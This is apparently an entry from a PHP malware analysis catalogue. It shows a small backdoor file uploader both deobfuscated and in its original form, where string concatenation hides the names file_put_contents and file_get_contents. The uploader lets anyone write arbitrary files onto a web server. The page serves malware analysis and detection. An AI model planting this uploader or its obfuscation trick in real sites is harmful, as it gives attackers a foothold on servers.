PHP Malware Analysis

Back to list

Tags


Deobfuscated code

<meta name="robots" content="noindex"><form method="post" enctype="multipart/form-data"><input type="file" name="btul"><button>Gaskan</button></form>
<?php 
$a = "file_put_contents";
$b = "file_get_contents";
$c = "tmp_name";
if (isset($_FILES['btul'])) {
    file_put_contents($_FILES['btul']['name'], file_get_contents($_FILES['btul'][$c]));
    if (file_exists("./" . $_FILES['btul']['name'])) {
        echo "Oke !";
    } else {
        echo "Fail !";
    }
}


Original code

<meta name="robots" content="noindex"><form method="post" enctype="multipart/form-data"><input type="file" name="btul"><button>Gaskan</button></form>
<?php
$a = "f"."i"."l"."e"."_"."p"."u"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
$b = "f"."i"."l"."e"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
$c = "t"."m"."p"."_"."n"."a"."m"."e";
if (isset($_FILES['btul'])) {$a($_FILES['btul']['name'], $b($_FILES['btul'][$c]));if (file_exists("./".$_FILES['btul']['name'])) {echo "Oke !";} else {echo "Fail !";}}
?>